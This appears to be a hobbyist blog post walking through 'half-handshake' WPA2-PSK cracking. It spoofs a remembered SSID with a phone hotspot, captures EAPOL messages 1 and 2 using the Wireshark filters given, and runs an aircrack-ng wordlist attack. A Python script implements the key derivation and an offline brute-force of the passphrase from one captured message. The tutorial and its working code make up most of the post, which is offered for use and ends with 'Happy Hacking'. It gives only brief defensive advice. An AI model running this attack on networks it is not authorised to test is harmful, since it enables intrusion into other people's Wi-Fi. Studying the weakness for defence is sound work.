Got around to playing with half-handshake cracking today, and I'm just a bit concerned right now. Cracking Wi-Fi by tricking devices into sending half a handshake is pretty easy.
So, I guess the advice would be: when you're not using Wi-Fi on your phone, turn it off when you're out and about. This attack does require a bit of recon and some info, but not much, so it's fast, easy and stealthy.

For this to work, you'll need a couple of things: a client that remembers a WPA/WPA2-PSK network it has joined in the past, a Linux machine running Aircrack-ng and Wireshark, and a smartphone that can run a Wi-Fi hotspot.

Start looking for clients probing for a known network (airodump-ng lists the probed SSIDs next to each station), and when you have found one, lock airodump-ng to that channel with -c and start Wireshark on the monitor-mode interface.

Start a fake access point on the phone with the same name as the SSID in the probe request, secured with WPA2-PSK, and watch the packets. Now, the trick to all of this is that the passphrase you set on your fake access point does not have to match the real one: in message 2 of the four-way handshake the client proves knowledge of its stored passphrase (a MIC computed from that passphrase, the SSID, both MAC addresses and the two nonces) before the AP has to prove anything, so set anything you like and this will still work.

Find the source address of the client and apply it as a filter in Wireshark; that should give you a filter something like this

wlan.ta == 72:ae:3c:7c:7d:d5


We need both sides of the conversation. Note that wlan.sa and wlan.ta both match only frames the client transmitted, so ORing them together still misses the AP's side; filter on wlan.addr instead, which matches whichever address field the client appears in:

wlan.addr == 72:ae:3c:7c:7d:d5

Note that your MAC addresses will be different, this is an example.

Last, check for EAPOL frames with "eapol" as the filter, or combine the two:

eapol || wlan.addr == 72:ae:3c:7c:7d:d5

You need both the EAPOL frames (messages 1 and 2 of the handshake) and a frame carrying the SSID, such as the probe request, for this to work, so make sure you see them before saving the capture. If aircrack-ng can't work out the network name from the file, you can supply it with -e followed by the SSID.

If you got them, save the displayed packets (File > Export Specified Packets) as plain pcap rather than pcapng, since older aircrack-ng builds can't read pcapng, and quit Wireshark. Now, find a good wordlist and fire up aircrack-ng

aircrack-ng -w word.list pcapfile.pcap

If the password is in the list, you should get a match. Do note that the client will only try to connect a couple of times before giving up, so start the capture BEFORE turning on the fake AP.
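To show why the fake AP's own passphrase never matters, here is an added Python example (not part of the original post, and not aircrack-ng's code) that plays both roles: the client derives its keys from the passphrase it remembers and MICs message 2, and the attacker, holding only the ANonce it chose and that one message 2, brute-forces the passphrase offline. The SSID, fake-AP MAC, passphrase, nonces and wordlist are constructed for the demo; the client MAC is the one used as an example above.

```python
import hashlib
import hmac
import struct

# Constructed values for the demo: the client MAC is the page's example; the
# SSID, fake-AP MAC and passphrase are assumptions made up for this script.
SSID = "CorpWiFi"
AP_MAC = bytes.fromhex("02aabbccddee")        # the attacker's fake AP
CLIENT_MAC = bytes.fromhex("72ae3c7c7dd5")    # 72:ae:3c:7c:7d:d5
REAL_PASSPHRASE = "correct horse"             # what the client remembers
# Minimal RSN IE (WPA2-PSK, CCMP) the client echoes in message 2's key data.
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: concatenate HMAC-SHA1(key, label||0x00||data||i), i=0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2) MIC: HMAC-SHA1 over the whole EAPOL frame
    with the 16-byte Key MIC field (offset 81) zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes, key_data: bytes = RSN_IE) -> bytes:
    """Lay out four-way handshake message 2 (EAPOL-Key, RSN descriptor)."""
    body = (b"\x02"                        # descriptor type: RSN
            + b"\x01\x0a"                  # key info: HMAC-SHA1 MIC, pairwise, MIC set
            + b"\x00\x00"                  # key length (0 in message 2)
            + struct.pack(">Q", 1)         # replay counter
            + snonce                       # key nonce = SNonce (frame offset 17..49)
            + b"\x00" * 16                 # key IV
            + b"\x00" * 8                  # key RSC
            + b"\x00" * 8                  # key ID
            + mic                          # key MIC (frame offset 81..97)
            + struct.pack(">H", len(key_data)) + key_data)
    return b"\x02\x03" + struct.pack(">H", len(body)) + body   # EAPOL v2, type Key


def client_msg2(passphrase, ssid, ap_mac, client_mac, anonce, snonce) -> bytes:
    """What the victim does: derive the PTK from its *stored* passphrase and the
    ANonce the fake AP sent in message 1, then MIC message 2 with the KCK."""
    pmk = pmk_from_passphrase(passphrase, ssid)
    ptk = ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce)
    unsigned = build_msg2(snonce, b"\x00" * 16)
    return build_msg2(snonce, eapol_mic(ptk[:16], unsigned))


def crack_half_handshake(wordlist, ssid, ap_mac, client_mac, anonce, msg2):
    """What the attacker does with messages 1 and 2 only: pull SNonce and MIC
    out of message 2 and test candidate passphrases offline."""
    snonce = msg2[17:49]
    mic = msg2[81:97]
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:          # not a legal WPA passphrase, skip
            continue
        ptk = ptk_from_pmk(pmk_from_passphrase(cand, ssid), ap_mac, client_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], msg2), mic):
            return cand
    return None


def demo(wordlist=("password", "letmein", "hunter2", "correct horse")):
    """Run the whole exchange. The fake AP's own passphrase never appears:
    the attacker chose ANonce, and the client supplied everything else."""
    anonce = bytes(range(32))          # attacker picks this freely in message 1
    snonce = bytes(range(32, 64))      # client's random nonce (fixed for the demo)
    msg2 = client_msg2(REAL_PASSPHRASE, SSID, AP_MAC, CLIENT_MAC, anonce, snonce)
    return crack_half_handshake(wordlist, SSID, AP_MAC, CLIENT_MAC, anonce, msg2)


if __name__ == "__main__":
    print("recovered:", demo())   # correct horse
```

The same offsets (SNonce at 17, MIC at 81) are what you would read out of the message 2 frame in your Wireshark capture; the ANonce comes from message 1, and the MACs and SSID from the frames you filtered above. The fake AP's passphrase only ever matters for message 3, which the attacker never needs to send.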

So, did we learn anything? Yep: any user that ever connected to your network became a threat all of a sudden. You can run all the best security in the world, but if even ONE phone has been connected in the past, and it has Wi-Fi turned on while its owner is out at lunch, AND the attacker knows this from a bit of recon, it's safe to assume they have half your handshake :)

As always Much Happy Hacking :)
